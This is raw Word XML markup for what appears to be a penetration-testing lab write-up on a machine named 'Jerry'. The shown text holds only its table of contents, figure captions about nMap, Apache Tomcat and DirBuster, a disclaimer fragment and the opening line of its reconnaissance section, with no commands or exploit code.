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763A" w14:textId="05BBA78B" w:rsidR="00060C0E" w:rsidRPr="00CB3015" w:rsidRDefault="00583DB6" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jerry</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69526767"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="78D3459F" w14:textId="11BF7E9C" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00CB3015">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc169526767" w:history="1">
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Index</w:t>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526767 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00F85552" w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C22D6E0" w14:textId="1643D306" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526768" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>List of pictures</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526768 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F9A41CA" w14:textId="72CAF10C" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526769" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Disclaimer</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526769 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BDACA3C" w14:textId="6673569B" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526770" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Reconnaissance</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526770 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="338D3032" w14:textId="169C262A" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526771" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Initial foothold</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526771 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A7EC42E" w14:textId="275983BA" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526772" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User flag</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526772 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C3906A1" w14:textId="3993BDE4" w:rsidR="00F85552" w:rsidRPr="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526773" w:history="1">
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Privilege escalation</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526773 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidRPr="00F85552">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFEF614" w14:textId="32C03A3C" w:rsidR="00CB3015" w:rsidRPr="00CB3015" w:rsidRDefault="00CB3015" w:rsidP="00CB3015">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77343B9E" w14:textId="7883258C" w:rsidR="00CB3015" w:rsidRPr="00D265A3" w:rsidRDefault="00CB3015" w:rsidP="00CB3015">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc169526768"/>
      <w:r w:rsidRPr="00D265A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>List of pictures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="6C1B6078" w14:textId="06AA0C33" w:rsidR="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc169526777" w:history="1">
        <w:r w:rsidRPr="0014369D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 1 - nMap scan results</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526777 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7150CC49" w14:textId="2F175099" w:rsidR="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526778" w:history="1">
        <w:r w:rsidRPr="0014369D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 2 - Apache Tomcat default page</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526778 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43B9F917" w14:textId="2668B762" w:rsidR="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526779" w:history="1">
        <w:r w:rsidRPr="0014369D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 3 - DirBuster search results</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526779 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5095C8D6" w14:textId="0657C7CF" w:rsidR="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526780" w:history="1">
        <w:r w:rsidRPr="0014369D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 4 - Apache Tomcat manager page</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526780 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D469FA6" w14:textId="3B98D9B7" w:rsidR="00F85552" w:rsidRDefault="00F85552">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169526781" w:history="1">
        <w:r w:rsidRPr="0014369D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 5 - Root shell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169526781 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D0EA927" w14:textId="396757FB" w:rsidR="00CB3015" w:rsidRPr="00D265A3" w:rsidRDefault="00F85552">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169526769"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6D772408" w14:textId="70A16508" w:rsidR="001409A8" w:rsidRPr="00CB3015"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who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F0A46" w14:textId="2454A4F4" w:rsidR="00060C0E" w:rsidRPr="00CB3015" w:rsidRDefault="00060C0E" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc169526770"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="30C20D15" w14:textId="4FFFE4CA" w:rsidR="00060C0E" w:rsidRDefault="00060C0E" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The result</w:t>
      </w:r>
      <w:r w:rsidR="00A84B06" w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an initial </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan </w:t>
      </w:r>
      <w:r w:rsidR="00A84B06" w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A2ECA" w14:textId="77777777" w:rsidR="00583DB6" w:rsidRDefault="00583DB6" w:rsidP="00583DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="148069B9" wp14:editId="1F2AC99B">
            <wp:extent cx="6120130" cy="2018030"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="12885944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9441" name="Immagine 128859441"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2018030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
